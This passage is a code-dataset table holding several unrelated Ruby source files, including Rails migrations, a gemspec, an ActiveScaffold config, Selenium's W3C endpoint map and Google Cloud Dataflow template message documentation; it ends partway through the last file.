hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
class AddTransferNote < ActiveRecord::Migration[5.1]
  # Adds an optional free-text `note` column to the transfers table.
  def change
    add_column :transfers, :note, :string
  end
end
| 19.666667 | 52 | 0.737288 |
f81f3b78b49052672e073edec719c4e135ad411d | 320 | # frozen_string_literal: true
require 'rails_helper'
# Clicks the "Like" button and verifies the outcome: the Like count
# increments by one, a "Liked!" confirmation is shown, the liker's full
# name appears on the page, and no "Dislike" input remains.
def like(user)
  expect { click_button 'Like' }.to change(Like, :count).by(1)

  expect(page).to have_content('Liked!')
  expect(page).to have_content("#{user.first_name} #{user.last_name}")
  expect(page).to_not have_xpath('//input', text: 'Dislike')
end
| 22.857143 | 70 | 0.709375 |
e2975e28af6d2d8e61779bbe0173f85ba1c374d7 | 1,541 | # frozen_string_literal: true
require_relative "lib/ruby2d/tiled/version"
Gem::Specification.new do |spec|
  spec.name    = "ruby2d-tiled"
  spec.version = Ruby2d::Tiled::VERSION
  spec.authors = ["Mario Visic"]
  spec.email   = ["[email protected]"]

  spec.summary     = "A tiled map generator plugin for ruby-2d"
  spec.description = "A tiled map generator plugin for ruby-2d"
  spec.homepage    = "https://github.com/mariovisic/ruby2d-tiled"
  spec.license     = "MIT"
  spec.required_ruby_version = Gem::Requirement.new(">= 2.4.0")

  spec.metadata["allowed_push_host"] = "https://rubygems.org/"
  spec.metadata["homepage_uri"]      = spec.homepage
  spec.metadata["source_code_uri"]   = "https://github.com/mariovisic/ruby2d-tiled"
  # spec.metadata["changelog_uri"] = "TODO: Put your gem's CHANGELOG.md URL here."

  # Package every file tracked by git, excluding test/spec/feature trees.
  spec.files = Dir.chdir(File.expand_path(__dir__)) do
    `git ls-files -z`.split("\x0").reject { |f| f.match(%r{\A(?:test|spec|features)/}) }
  end
  spec.bindir        = "exe"
  spec.executables   = spec.files.grep(%r{\Aexe/}) { |f| File.basename(f) }
  spec.require_paths = ["lib"]

  # Runtime dependencies would be registered here, e.g.:
  # spec.add_dependency "example-gem", "~> 1.0"
  # For more on authoring gems see https://bundler.io/guides/creating_gem.html
end
| 40.552632 | 88 | 0.680078 |
# Configuration object for ActiveScaffold's Search action.
# Class-level (cattr_*) settings are global defaults; each instance copies
# them in #initialize so they can be overridden per controller.
module ActiveScaffold::Config
  class Search < Base
    # Search is a read-only action for authorization purposes.
    self.crud_type = :read

    # Seeds instance-level settings from the class-level defaults.
    def initialize(core_config)
      @core = core_config
      @text_search = self.class.text_search
      @live = self.class.live?
      # start with the ActionLink defined globally
      @link = self.class.link.clone
      @action_group = self.class.action_group.clone if self.class.action_group
    end

    # global level configuration
    # --------------------------

    # the ActionLink for this action
    cattr_accessor :link
    @@link = ActiveScaffold::DataStructures::ActionLink.new('show_search', :label => :search, :type => :collection, :security_method => :search_authorized?, :ignore_method => :search_ignore?)

    # A flag for how the search should do full-text searching in the database:
    # * :full: LIKE %?%
    # * :start: LIKE ?%
    # * :end: LIKE %?
    # * false: LIKE ?
    # Default is :full
    cattr_accessor :text_search
    @@text_search = :full

    # whether submits the search as you type
    # NOTE(review): @@live is never explicitly assigned in this file;
    # presumably cattr_writer initializes it (to nil) or it is set elsewhere
    # in the library — verify before relying on self.live? at load time.
    cattr_writer :live
    def self.live?
      @@live
    end

    # instance-level configuration
    # ----------------------------

    # provides access to the list of columns specifically meant for the Search to use
    def columns
      # we want to delay initializing to the @core.columns set for as long as possible. Too soon and .search_sql will not be available to .searchable?
      unless @columns
        self.columns = @core.columns.collect{|c| c.name if @core.columns._inheritable.include?(c.name) and c.searchable? and c.column and c.column.text?}.compact
      end
      @columns
    end
    # Expose the columns= writer (defined in a superclass) publicly.
    public :columns=

    # A flag for how the search should do full-text searching in the database:
    # * :full: LIKE %?%
    # * :start: LIKE ?%
    # * :end: LIKE %?
    # * false: LIKE ?
    # Default is :full
    attr_accessor :text_search

    # the ActionLink for this action
    attr_accessor :link

    # whether submits the search as you type
    attr_writer :live
    def live?
      @live
    end
  end
end
| 29.1 | 191 | 0.635248 |
module Erp::Carts
  # A shopper's product-comparison list; items cascade-delete with it.
  class Compare < ApplicationRecord
    has_many :compare_items, dependent: :destroy

    # Number of items currently on the comparison list.
    def get_number_items
      compare_items.count
    end

    # Removes the item(s) matching the given id from the list.
    def remove_compare_item(compare_item_id)
      compare_items.where(id: compare_item_id).destroy_all
    end
  end
end
| 22.142857 | 63 | 0.709677 |
38f96e5ab100431f0c46bc490ff0efe738ffb04a | 195 | require "erubis"
module Capper
  module Utils
    module Systemd
      # Builds and runs a `systemctl --user` command. Arguments may be
      # symbols, strings, or nested arrays; they are flattened, stringified,
      # and space-joined before being handed to `run` (provided by the host).
      def systemctl(*args)
        subcommand = args.flatten.map(&:to_s).join(" ")
        run("systemctl --user " + subcommand)
      end
    end
  end
end
| 13.928571 | 71 | 0.589744 |
798bc4e2151f53721003c6f99f26d9a7401d723b | 6,084 | # frozen_string_literal: true
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
module Selenium
  module WebDriver
    module Remote
      module W3C
        #
        # http://www.w3.org/TR/2015/WD-webdriver-20150918/#list-of-endpoints
        # @api private
        #
        # Maps each W3C WebDriver command name to its [HTTP verb, URL template]
        # pair. Colon-prefixed segments (:session_id, :id, :name, ...) are
        # placeholders substituted per request.
        #
        class Bridge
          COMMANDS = {
            #
            # session handling
            #
            new_session: [:post, 'session'],
            delete_session: [:delete, 'session/:session_id'],
            #
            # basic driver
            #
            get: [:post, 'session/:session_id/url'],
            get_current_url: [:get, 'session/:session_id/url'],
            back: [:post, 'session/:session_id/back'],
            forward: [:post, 'session/:session_id/forward'],
            refresh: [:post, 'session/:session_id/refresh'],
            get_title: [:get, 'session/:session_id/title'],
            #
            # window and Frame handling
            #
            get_window_handle: [:get, 'session/:session_id/window'],
            close_window: [:delete, 'session/:session_id/window'],
            switch_to_window: [:post, 'session/:session_id/window'],
            get_window_handles: [:get, 'session/:session_id/window/handles'],
            fullscreen_window: [:post, 'session/:session_id/window/fullscreen'],
            minimize_window: [:post, 'session/:session_id/window/minimize'],
            maximize_window: [:post, 'session/:session_id/window/maximize'],
            set_window_size: [:post, 'session/:session_id/window/size'],
            get_window_size: [:get, 'session/:session_id/window/size'],
            set_window_position: [:post, 'session/:session_id/window/position'],
            get_window_position: [:get, 'session/:session_id/window/position'],
            set_window_rect: [:post, 'session/:session_id/window/rect'],
            get_window_rect: [:get, 'session/:session_id/window/rect'],
            switch_to_frame: [:post, 'session/:session_id/frame'],
            switch_to_parent_frame: [:post, 'session/:session_id/frame/parent'],
            #
            # element
            #
            find_element: [:post, 'session/:session_id/element'],
            find_elements: [:post, 'session/:session_id/elements'],
            find_child_element: [:post, 'session/:session_id/element/:id/element'],
            find_child_elements: [:post, 'session/:session_id/element/:id/elements'],
            get_active_element: [:get, 'session/:session_id/element/active'],
            is_element_selected: [:get, 'session/:session_id/element/:id/selected'],
            get_element_attribute: [:get, 'session/:session_id/element/:id/attribute/:name'],
            get_element_property: [:get, 'session/:session_id/element/:id/property/:name'],
            get_element_css_value: [:get, 'session/:session_id/element/:id/css/:property_name'],
            get_element_text: [:get, 'session/:session_id/element/:id/text'],
            get_element_tag_name: [:get, 'session/:session_id/element/:id/name'],
            get_element_rect: [:get, 'session/:session_id/element/:id/rect'],
            is_element_enabled: [:get, 'session/:session_id/element/:id/enabled'],
            #
            # document handling
            #
            get_page_source: [:get, 'session/:session_id/source'],
            execute_script: [:post, 'session/:session_id/execute/sync'],
            execute_async_script: [:post, 'session/:session_id/execute/async'],
            #
            # cookies
            #
            get_all_cookies: [:get, 'session/:session_id/cookie'],
            get_cookie: [:get, 'session/:session_id/cookie/:name'],
            add_cookie: [:post, 'session/:session_id/cookie'],
            delete_cookie: [:delete, 'session/:session_id/cookie/:name'],
            delete_all_cookies: [:delete, 'session/:session_id/cookie'],
            #
            # timeouts
            #
            set_timeout: [:post, 'session/:session_id/timeouts'],
            #
            # actions
            #
            actions: [:post, 'session/:session_id/actions'],
            release_actions: [:delete, 'session/:session_id/actions'],
            #
            # Element Operations
            #
            element_click: [:post, 'session/:session_id/element/:id/click'],
            element_tap: [:post, 'session/:session_id/element/:id/tap'],
            element_clear: [:post, 'session/:session_id/element/:id/clear'],
            element_send_keys: [:post, 'session/:session_id/element/:id/value'],
            #
            # alerts
            #
            dismiss_alert: [:post, 'session/:session_id/alert/dismiss'],
            accept_alert: [:post, 'session/:session_id/alert/accept'],
            get_alert_text: [:get, 'session/:session_id/alert/text'],
            send_alert_text: [:post, 'session/:session_id/alert/text'],
            #
            # screenshot
            #
            take_screenshot: [:get, 'session/:session_id/screenshot'],
            take_element_screenshot: [:get, 'session/:session_id/element/:id/screenshot'],
            #
            # server extensions
            #
            upload_file: [:post, 'session/:session_id/se/file']
          }.freeze
        end # Bridge
      end # W3C
    end # Remote
  end # WebDriver
end # Selenium
| 38.751592 | 96 | 0.594181 |
class CreateClassroomChats < ActiveRecord::Migration
  # Creates the classroom_chats table: a chat message posted by a user
  # within a classroom.
  def change
    create_table :classroom_chats do |table|
      table.references :classroom, index: true, foreign_key: true
      table.references :user, index: true, foreign_key: true
      table.text :content

      table.timestamps null: false
    end
  end
end
| 24.833333 | 61 | 0.701342 |
abc7b5d44630168733ebb1f7f6fed8d1bb427c80 | 31,664 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
module Google
module Cloud
module Dataflow
module V1beta3
# Response to the request to launch a job from Flex Template.
# @!attribute [rw] job
# @return [::Google::Cloud::Dataflow::V1beta3::Job]
# The job that was launched, if the request was not a dry run and
# the job was successfully launched.
class LaunchFlexTemplateResponse
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# Container Spec.
# @!attribute [rw] image
# @return [::String]
# Name of the docker container image. E.g., gcr.io/project/some-image
# @!attribute [rw] metadata
# @return [::Google::Cloud::Dataflow::V1beta3::TemplateMetadata]
# Metadata describing a template including description and validation rules.
# @!attribute [rw] sdk_info
# @return [::Google::Cloud::Dataflow::V1beta3::SDKInfo]
# Required. SDK info of the Flex Template.
# @!attribute [rw] default_environment
# @return [::Google::Cloud::Dataflow::V1beta3::FlexTemplateRuntimeEnvironment]
# Default runtime environment for the job.
class ContainerSpec
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# Launch FlexTemplate Parameter.
# @!attribute [rw] job_name
# @return [::String]
# Required. The job name to use for the created job. For update job request,
# job name should be same as the existing running job.
# @!attribute [rw] container_spec
# @return [::Google::Cloud::Dataflow::V1beta3::ContainerSpec]
# Spec about the container image to launch.
# @!attribute [rw] container_spec_gcs_path
# @return [::String]
# Cloud Storage path to a file with json serialized ContainerSpec as
# content.
# @!attribute [rw] parameters
# @return [::Google::Protobuf::Map{::String => ::String}]
# The parameters for FlexTemplate.
# Ex. \\{"num_workers":"5"}
# @!attribute [rw] launch_options
# @return [::Google::Protobuf::Map{::String => ::String}]
# Launch options for this flex template job. This is a common set of options
# across languages and templates. This should not be used to pass job
# parameters.
# @!attribute [rw] environment
# @return [::Google::Cloud::Dataflow::V1beta3::FlexTemplateRuntimeEnvironment]
# The runtime environment for the FlexTemplate job
# @!attribute [rw] update
# @return [::Boolean]
# Set this to true if you are sending a request to update a running
# streaming job. When set, the job name should be the same as the
# running job.
# @!attribute [rw] transform_name_mappings
# @return [::Google::Protobuf::Map{::String => ::String}]
# Use this to pass transform_name_mappings for streaming update jobs.
# Ex:\\{"oldTransformName":"newTransformName",...}'
class LaunchFlexTemplateParameter
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
# @!attribute [rw] key
# @return [::String]
# @!attribute [rw] value
# @return [::String]
class ParametersEntry
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# @!attribute [rw] key
# @return [::String]
# @!attribute [rw] value
# @return [::String]
class LaunchOptionsEntry
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# @!attribute [rw] key
# @return [::String]
# @!attribute [rw] value
# @return [::String]
class TransformNameMappingsEntry
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
end
# The environment values to be set at runtime for flex template.
# @!attribute [rw] num_workers
# @return [::Integer]
# The initial number of Google Compute Engine instances for the job.
# @!attribute [rw] max_workers
# @return [::Integer]
# The maximum number of Google Compute Engine instances to be made
# available to your pipeline during execution, from 1 to 1000.
# @!attribute [rw] zone
# @return [::String]
# The Compute Engine [availability
# zone](https://cloud.google.com/compute/docs/regions-zones/regions-zones)
# for launching worker instances to run your pipeline.
# In the future, worker_zone will take precedence.
# @!attribute [rw] service_account_email
# @return [::String]
# The email address of the service account to run the job as.
# @!attribute [rw] temp_location
# @return [::String]
# The Cloud Storage path to use for temporary files.
# Must be a valid Cloud Storage URL, beginning with `gs://`.
# @!attribute [rw] machine_type
# @return [::String]
# The machine type to use for the job. Defaults to the value from the
# template if not specified.
# @!attribute [rw] additional_experiments
# @return [::Array<::String>]
# Additional experiment flags for the job.
# @!attribute [rw] network
# @return [::String]
# Network to which VMs will be assigned. If empty or unspecified,
# the service will use the network "default".
# @!attribute [rw] subnetwork
# @return [::String]
# Subnetwork to which VMs will be assigned, if desired. You can specify a
# subnetwork using either a complete URL or an abbreviated path. Expected to
# be of the form
# "https://www.googleapis.com/compute/v1/projects/HOST_PROJECT_ID/regions/REGION/subnetworks/SUBNETWORK"
# or "regions/REGION/subnetworks/SUBNETWORK". If the subnetwork is located in
# a Shared VPC network, you must use the complete URL.
# @!attribute [rw] additional_user_labels
# @return [::Google::Protobuf::Map{::String => ::String}]
# Additional user labels to be specified for the job.
# Keys and values must follow the restrictions specified in the [labeling
# restrictions](https://cloud.google.com/compute/docs/labeling-resources#restrictions)
# page.
# An object containing a list of "key": value pairs.
# Example: { "name": "wrench", "mass": "1kg", "count": "3" }.
# @!attribute [rw] kms_key_name
# @return [::String]
# Name for the Cloud KMS key for the job.
# Key format is:
# projects/<project>/locations/<location>/keyRings/<keyring>/cryptoKeys/<key>
# @!attribute [rw] ip_configuration
# @return [::Google::Cloud::Dataflow::V1beta3::WorkerIPAddressConfiguration]
# Configuration for VM IPs.
# @!attribute [rw] worker_region
# @return [::String]
# The Compute Engine region
# (https://cloud.google.com/compute/docs/regions-zones/regions-zones) in
# which worker processing should occur, e.g. "us-west1". Mutually exclusive
# with worker_zone. If neither worker_region nor worker_zone is specified,
# default to the control plane's region.
# @!attribute [rw] worker_zone
# @return [::String]
# The Compute Engine zone
# (https://cloud.google.com/compute/docs/regions-zones/regions-zones) in
# which worker processing should occur, e.g. "us-west1-a". Mutually exclusive
# with worker_region. If neither worker_region nor worker_zone is specified,
# a zone in the control plane's region is chosen based on available capacity.
# If both `worker_zone` and `zone` are set, `worker_zone` takes precedence.
# @!attribute [rw] enable_streaming_engine
# @return [::Boolean]
# Whether to enable Streaming Engine for the job.
# @!attribute [rw] flexrs_goal
# @return [::Google::Cloud::Dataflow::V1beta3::FlexResourceSchedulingGoal]
# Set FlexRS goal for the job.
# https://cloud.google.com/dataflow/docs/guides/flexrs
# @!attribute [rw] staging_location
# @return [::String]
# The Cloud Storage path for staging local files.
# Must be a valid Cloud Storage URL, beginning with `gs://`.
# @!attribute [rw] sdk_container_image
# @return [::String]
# Docker registry location of container image to use for the 'worker harness.
# Default is the container for the version of the SDK. Note this field is
# only valid for portable pipelines.
# @!attribute [rw] disk_size_gb
# @return [::Integer]
# Worker disk size, in gigabytes.
# @!attribute [rw] autoscaling_algorithm
# @return [::Google::Cloud::Dataflow::V1beta3::AutoscalingAlgorithm]
# The algorithm to use for autoscaling
# @!attribute [rw] dump_heap_on_oom
# @return [::Boolean]
# If true, save a heap dump before killing a thread or process which is GC
# thrashing or out of memory. The location of the heap file will either be
# echoed back to the user, or the user will be given the opportunity to
# download the heap file.
# @!attribute [rw] save_heap_dumps_to_gcs_path
# @return [::String]
# Cloud Storage bucket (directory) to upload heap dumps to the given
# location. Enabling this implies that heap dumps should be generated on OOM
# (dump_heap_on_oom is set to true).
# @!attribute [rw] launcher_machine_type
# @return [::String]
# The machine type to use for launching the job. The default is
# n1-standard-1.
class FlexTemplateRuntimeEnvironment
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
# @!attribute [rw] key
# @return [::String]
# @!attribute [rw] value
# @return [::String]
class AdditionalUserLabelsEntry
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
end
# A request to launch a Cloud Dataflow job from a FlexTemplate.
# @!attribute [rw] project_id
# @return [::String]
# Required. The ID of the Cloud Platform project that the job belongs to.
# @!attribute [rw] launch_parameter
# @return [::Google::Cloud::Dataflow::V1beta3::LaunchFlexTemplateParameter]
# Required. Parameter to launch a job form Flex Template.
# @!attribute [rw] location
# @return [::String]
# Required. The [regional endpoint]
# (https://cloud.google.com/dataflow/docs/concepts/regional-endpoints) to
# which to direct the request. E.g., us-central1, us-west1.
# @!attribute [rw] validate_only
# @return [::Boolean]
# If true, the request is validated but not actually executed.
# Defaults to false.
class LaunchFlexTemplateRequest
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# The environment values to set at runtime.
# @!attribute [rw] num_workers
# @return [::Integer]
# The initial number of Google Compute Engine instnaces for the job.
# @!attribute [rw] max_workers
# @return [::Integer]
# The maximum number of Google Compute Engine instances to be made
# available to your pipeline during execution, from 1 to 1000.
# @!attribute [rw] zone
# @return [::String]
# The Compute Engine [availability
# zone](https://cloud.google.com/compute/docs/regions-zones/regions-zones)
# for launching worker instances to run your pipeline.
# In the future, worker_zone will take precedence.
# @!attribute [rw] service_account_email
# @return [::String]
# The email address of the service account to run the job as.
# @!attribute [rw] temp_location
# @return [::String]
# The Cloud Storage path to use for temporary files.
# Must be a valid Cloud Storage URL, beginning with `gs://`.
# @!attribute [rw] bypass_temp_dir_validation
# @return [::Boolean]
# Whether to bypass the safety checks for the job's temporary directory.
# Use with caution.
# @!attribute [rw] machine_type
# @return [::String]
# The machine type to use for the job. Defaults to the value from the
# template if not specified.
# @!attribute [rw] additional_experiments
# @return [::Array<::String>]
# Additional experiment flags for the job, specified with the
# `--experiments` option.
# @!attribute [rw] network
# @return [::String]
# Network to which VMs will be assigned. If empty or unspecified,
# the service will use the network "default".
# @!attribute [rw] subnetwork
# @return [::String]
# Subnetwork to which VMs will be assigned, if desired. You can specify a
# subnetwork using either a complete URL or an abbreviated path. Expected to
# be of the form
# "https://www.googleapis.com/compute/v1/projects/HOST_PROJECT_ID/regions/REGION/subnetworks/SUBNETWORK"
# or "regions/REGION/subnetworks/SUBNETWORK". If the subnetwork is located in
# a Shared VPC network, you must use the complete URL.
# @!attribute [rw] additional_user_labels
# @return [::Google::Protobuf::Map{::String => ::String}]
# Additional user labels to be specified for the job.
# Keys and values should follow the restrictions specified in the [labeling
# restrictions](https://cloud.google.com/compute/docs/labeling-resources#restrictions)
# page.
# An object containing a list of "key": value pairs.
# Example: { "name": "wrench", "mass": "1kg", "count": "3" }.
# @!attribute [rw] kms_key_name
# @return [::String]
# Name for the Cloud KMS key for the job.
# Key format is:
# projects/<project>/locations/<location>/keyRings/<keyring>/cryptoKeys/<key>
# @!attribute [rw] ip_configuration
# @return [::Google::Cloud::Dataflow::V1beta3::WorkerIPAddressConfiguration]
# Configuration for VM IPs.
# @!attribute [rw] worker_region
# @return [::String]
# The Compute Engine region
# (https://cloud.google.com/compute/docs/regions-zones/regions-zones) in
# which worker processing should occur, e.g. "us-west1". Mutually exclusive
# with worker_zone. If neither worker_region nor worker_zone is specified,
# default to the control plane's region.
# @!attribute [rw] worker_zone
# @return [::String]
# The Compute Engine zone
# (https://cloud.google.com/compute/docs/regions-zones/regions-zones) in
# which worker processing should occur, e.g. "us-west1-a". Mutually exclusive
# with worker_region. If neither worker_region nor worker_zone is specified,
# a zone in the control plane's region is chosen based on available capacity.
# If both `worker_zone` and `zone` are set, `worker_zone` takes precedence.
# @!attribute [rw] enable_streaming_engine
# @return [::Boolean]
# Whether to enable Streaming Engine for the job.
class RuntimeEnvironment
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
# @!attribute [rw] key
# @return [::String]
# @!attribute [rw] value
# @return [::String]
class AdditionalUserLabelsEntry
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
end
# Metadata for a specific parameter.
# @!attribute [rw] name
# @return [::String]
# Required. The name of the parameter.
# @!attribute [rw] label
# @return [::String]
# Required. The label to display for the parameter.
# @!attribute [rw] help_text
# @return [::String]
# Required. The help text to display for the parameter.
# @!attribute [rw] is_optional
# @return [::Boolean]
# Optional. Whether the parameter is optional. Defaults to false.
# @!attribute [rw] regexes
# @return [::Array<::String>]
# Optional. Regexes that the parameter must match.
# @!attribute [rw] param_type
# @return [::Google::Cloud::Dataflow::V1beta3::ParameterType]
# Optional. The type of the parameter.
# Used for selecting input picker.
# @!attribute [rw] custom_metadata
# @return [::Google::Protobuf::Map{::String => ::String}]
# Optional. Additional metadata for describing this parameter.
class ParameterMetadata
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
# @!attribute [rw] key
# @return [::String]
# @!attribute [rw] value
# @return [::String]
class CustomMetadataEntry
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
end
# Metadata describing a template.
# @!attribute [rw] name
# @return [::String]
# Required. The name of the template.
# @!attribute [rw] description
# @return [::String]
# Optional. A description of the template.
# @!attribute [rw] parameters
# @return [::Array<::Google::Cloud::Dataflow::V1beta3::ParameterMetadata>]
# The parameters for the template.
class TemplateMetadata
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# SDK Information.
# @!attribute [rw] language
# @return [::Google::Cloud::Dataflow::V1beta3::SDKInfo::Language]
# Required. The SDK Language.
# @!attribute [rw] version
# @return [::String]
# Optional. The SDK version.
class SDKInfo
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
# SDK Language.
module Language
# UNKNOWN Language.
UNKNOWN = 0
# Java.
JAVA = 1
# Python.
PYTHON = 2
end
end
# RuntimeMetadata describing a runtime environment.
# @!attribute [rw] sdk_info
# @return [::Google::Cloud::Dataflow::V1beta3::SDKInfo]
# SDK Info for the template.
# @!attribute [rw] parameters
# @return [::Array<::Google::Cloud::Dataflow::V1beta3::ParameterMetadata>]
# The parameters for the template.
class RuntimeMetadata
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# A request to create a Cloud Dataflow job from a template.
# @!attribute [rw] project_id
# @return [::String]
# Required. The ID of the Cloud Platform project that the job belongs to.
# @!attribute [rw] job_name
# @return [::String]
# Required. The job name to use for the created job.
# @!attribute [rw] gcs_path
# @return [::String]
# Required. A Cloud Storage path to the template from which to
# create the job.
# Must be a valid Cloud Storage URL, beginning with `gs://`.
# @!attribute [rw] parameters
# @return [::Google::Protobuf::Map{::String => ::String}]
# The runtime parameters to pass to the job.
# @!attribute [rw] environment
# @return [::Google::Cloud::Dataflow::V1beta3::RuntimeEnvironment]
# The runtime environment for the job.
# @!attribute [rw] location
# @return [::String]
# The [regional endpoint]
# (https://cloud.google.com/dataflow/docs/concepts/regional-endpoints) to
# which to direct the request.
class CreateJobFromTemplateRequest
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
# @!attribute [rw] key
# @return [::String]
# @!attribute [rw] value
# @return [::String]
class ParametersEntry
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
end
# A request to retrieve a Cloud Dataflow job template.
# @!attribute [rw] project_id
# @return [::String]
# Required. The ID of the Cloud Platform project that the job belongs to.
# @!attribute [rw] gcs_path
# @return [::String]
# Required. A Cloud Storage path to the template from which to
# create the job.
# Must be valid Cloud Storage URL, beginning with 'gs://'.
# @!attribute [rw] view
# @return [::Google::Cloud::Dataflow::V1beta3::GetTemplateRequest::TemplateView]
# The view to retrieve. Defaults to METADATA_ONLY.
# @!attribute [rw] location
# @return [::String]
# The [regional endpoint]
# (https://cloud.google.com/dataflow/docs/concepts/regional-endpoints) to
# which to direct the request.
class GetTemplateRequest
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
# The various views of a template that may be retrieved.
module TemplateView
# Template view that retrieves only the metadata associated with the
# template.
METADATA_ONLY = 0
end
end
# The response to a GetTemplate request.
# @!attribute [rw] status
# @return [::Google::Rpc::Status]
# The status of the get template request. Any problems with the
# request will be indicated in the error_details.
# @!attribute [rw] metadata
# @return [::Google::Cloud::Dataflow::V1beta3::TemplateMetadata]
# The template metadata describing the template name, available
# parameters, etc.
# @!attribute [rw] template_type
# @return [::Google::Cloud::Dataflow::V1beta3::GetTemplateResponse::TemplateType]
# Template Type.
# @!attribute [rw] runtime_metadata
# @return [::Google::Cloud::Dataflow::V1beta3::RuntimeMetadata]
# Describes the runtime metadata with SDKInfo and available parameters.
class GetTemplateResponse
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
# Template Type.
module TemplateType
# Unknown Template Type.
UNKNOWN = 0
# Legacy Template.
LEGACY = 1
# Flex Template.
FLEX = 2
end
end
# Parameters to provide to the template being launched.
# @!attribute [rw] job_name
# @return [::String]
# Required. The job name to use for the created job.
# @!attribute [rw] parameters
# @return [::Google::Protobuf::Map{::String => ::String}]
# The runtime parameters to pass to the job.
# @!attribute [rw] environment
# @return [::Google::Cloud::Dataflow::V1beta3::RuntimeEnvironment]
# The runtime environment for the job.
# @!attribute [rw] update
# @return [::Boolean]
# If set, replace the existing pipeline with the name specified by jobName
# with this pipeline, preserving state.
# @!attribute [rw] transform_name_mapping
# @return [::Google::Protobuf::Map{::String => ::String}]
# Only applicable when updating a pipeline. Map of transform name prefixes of
# the job to be replaced to the corresponding name prefixes of the new job.
class LaunchTemplateParameters
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
# @!attribute [rw] key
# @return [::String]
# @!attribute [rw] value
# @return [::String]
class ParametersEntry
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# @!attribute [rw] key
# @return [::String]
# @!attribute [rw] value
# @return [::String]
class TransformNameMappingEntry
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
end
# A request to launch a template.
# @!attribute [rw] project_id
# @return [::String]
# Required. The ID of the Cloud Platform project that the job belongs to.
# @!attribute [rw] validate_only
# @return [::Boolean]
# If true, the request is validated but not actually executed.
# Defaults to false.
# @!attribute [rw] gcs_path
# @return [::String]
# A Cloud Storage path to the template from which to create
# the job.
# Must be valid Cloud Storage URL, beginning with 'gs://'.
# @!attribute [rw] dynamic_template
# @return [::Google::Cloud::Dataflow::V1beta3::DynamicTemplateLaunchParams]
# Params for launching a dynamic template.
# @!attribute [rw] launch_parameters
# @return [::Google::Cloud::Dataflow::V1beta3::LaunchTemplateParameters]
# The parameters of the template to launch. This should be part of the
# body of the POST request.
# @!attribute [rw] location
# @return [::String]
# The [regional endpoint]
# (https://cloud.google.com/dataflow/docs/concepts/regional-endpoints) to
# which to direct the request.
class LaunchTemplateRequest
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# Response to the request to launch a template.
# @!attribute [rw] job
# @return [::Google::Cloud::Dataflow::V1beta3::Job]
# The job that was launched, if the request was not a dry run and
# the job was successfully launched.
class LaunchTemplateResponse
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# Used in the error_details field of a google.rpc.Status message, this
# indicates problems with the template parameter.
# @!attribute [rw] parameter_violations
# @return [::Array<::Google::Cloud::Dataflow::V1beta3::InvalidTemplateParameters::ParameterViolation>]
# Describes all parameter violations in a template request.
class InvalidTemplateParameters
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
# A specific template-parameter violation.
# @!attribute [rw] parameter
# @return [::String]
# The parameter that failed to validate.
# @!attribute [rw] description
# @return [::String]
# A description of why the parameter failed to validate.
class ParameterViolation
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
end
# Params which should be passed when launching a dynamic template.
# @!attribute [rw] gcs_path
# @return [::String]
# Path to dynamic template spec file on Cloud Storage.
# The file must be a Json serialized DynamicTemplateFieSpec object.
# @!attribute [rw] staging_location
# @return [::String]
# Cloud Storage path for staging dependencies.
